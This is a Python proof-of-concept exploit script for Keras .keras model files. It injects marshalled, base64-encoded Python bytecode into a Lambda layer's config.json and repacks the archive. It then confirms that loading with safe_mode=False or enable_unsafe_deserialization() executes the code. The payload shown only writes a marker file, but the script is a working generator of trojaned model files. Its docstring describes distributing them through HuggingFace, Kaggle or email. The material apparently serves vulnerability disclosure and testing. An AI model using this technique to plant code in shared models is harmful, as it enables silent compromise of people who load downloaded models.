#!/usr/bin/env python3 """ Keras .keras Lambda Layer - Arbitrary Code Execution PoC VULNERABILITY: .keras model files are ZIP archives containing config.json. Lambda layers store base64-encoded marshal'd Python bytecode in config.json under the "function" -> "config" -> "code" key. When a model is loaded with safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()), this bytecode is unmarshalled and executed - enabling arbitrary code execution from a crafted model file. IMPACT: Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary code execution. Many official tutorials and StackOverflow answers recommend safe_mode=False to load models with custom layers. HuggingFace hosts thousands of .keras files that could be replaced with malicious versions. ATTACK VECTOR: 1. Attacker creates a legitimate-looking .keras model 2. Attacker replaces Lambda layer bytecode with malicious payload 3. Victim downloads model from HuggingFace, Kaggle, or email 4. Victim loads with safe_mode=False -> code executes silently AFFECTED: - keras >= 3.0 (all versions using .keras format) - tensorflow >= 2.16 (ships keras 3.x) TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12 Usage: python3 poc_keras_lambda_ace.py """ import os import sys import json import zipfile import marshal import base64 import types import tempfile import shutil os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3" MARKER_FILE = "/tmp/keras_ace_marker.txt" PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED" def create_malicious_keras_model(output_path): import tensorflow as tf import numpy as np print("[*] Step 1: Building legitimate model with Lambda layer...") model = tf.keras.Sequential([ tf.keras.layers.Input(shape=(5,)), tf.keras.layers.Dense(10, name="dense_1"), tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"), tf.keras.layers.Dense(1, name="output"), ]) model.compile(optimizer="adam", loss="mse") tmp_dir = tempfile.mkdtemp(prefix="keras_poc_") legit_path = os.path.join(tmp_dir, "legit.keras") model.save(legit_path) print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path))) print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...") with zipfile.ZipFile(legit_path, "r") as zf: archive_files = {name: zf.read(name) for name in zf.namelist()} config = json.loads(archive_files["config.json"]) evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format( MARKER_FILE, PAYLOAD_MSG ) print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE)) evil_expr = compile(evil_source, "", "eval") lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0] evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n" print(" Encoded bytecode: {} chars".format(len(evil_b64))) def inject_into_lambda(obj): if isinstance(obj, dict): if obj.get("class_name") == "Lambda" and "config" in obj: func = obj["config"].get("function", {}) if isinstance(func, dict) and "config" in func: func["config"]["code"] = evil_b64 print(" Injected payload into Lambda layer config") return True for v in obj.values(): if isinstance(v, (dict, list)) and inject_into_lambda(v): return True elif isinstance(obj, list): for v in obj: if inject_into_lambda(v): return True return False if not inject_into_lambda(config): print(" ERROR: Could not find Lambda layer in config.json") sys.exit(1) print("[*] Step 3: Repacking .keras file with malicious config...") archive_files["config.json"] = json.dumps(config).encode() with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf: for name, data in archive_files.items(): zf.writestr(name, data) print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path))) shutil.rmtree(tmp_dir) def test_safe_mode_true(model_path): import tensorflow as tf print("\n[*] Test A: Loading with safe_mode=True (default)...") if os.path.exists(MARKER_FILE): os.remove(MARKER_FILE) try: tf.keras.models.load_model(model_path) print(" Model loaded (unexpected)") return os.path.exists(MARKER_FILE) except Exception as e: print(" Blocked as expected: {}".format(str(e)[:150])) return False def test_safe_mode_false(model_path): import tensorflow as tf import numpy as np print("\n[*] Test B: Loading with safe_mode=False...") if os.path.exists(MARKER_FILE): os.remove(MARKER_FILE) try: loaded = tf.keras.models.load_model(model_path, safe_mode=False) print(" Model loaded with safe_mode=False") if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: content = f.read().strip() print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) return True print(" No execution on load. Running inference...") result = loaded.predict(np.random.randn(1, 5), verbose=0) print(" Inference result: {}".format(result)) if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: content = f.read().strip() print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) return True print(" No ACE triggered") return False except Exception as e: print(" Error: {}".format(str(e)[:300])) return False def test_enable_unsafe_deserialization(model_path): import tensorflow as tf import numpy as np print("\n[*] Test C: Loading with enable_unsafe_deserialization()...") if os.path.exists(MARKER_FILE): os.remove(MARKER_FILE) try: tf.keras.config.enable_unsafe_deserialization() loaded = tf.keras.models.load_model(model_path) print(" Model loaded with enable_unsafe_deserialization") if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: content = f.read().strip() print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) return True print(" No execution on load. Running inference...") result = loaded.predict(np.random.randn(1, 5), verbose=0) if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: content = f.read().strip() print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) return True print(" No ACE triggered") return False except Exception as e: print(" Error: {}".format(str(e)[:300])) return False def main(): print("=" * 70) print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC") print("=" * 70) script_dir = os.path.dirname(os.path.abspath(__file__)) malicious_model = os.path.join(script_dir, "malicious_lambda.keras") if os.path.exists(MARKER_FILE): os.remove(MARKER_FILE) create_malicious_keras_model(malicious_model) ace_safe = test_safe_mode_true(malicious_model) ace_unsafe = test_safe_mode_false(malicious_model) ace_global = test_enable_unsafe_deserialization(malicious_model) print("\n" + "=" * 70) print("RESULTS:") print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)")) print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE")) print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE")) print() if ace_unsafe or ace_global: print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary") print("code execution when loaded with safe_mode=False or after calling") print("enable_unsafe_deserialization().") print() print("Marker file: {}".format(MARKER_FILE)) if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: print("Contents: {}".format(f.read().strip())) print("\nMalicious model saved to: {}".format(malicious_model)) else: print("No ACE triggered. Check TensorFlow/Keras version.") print("=" * 70) if __name__ == "__main__": main()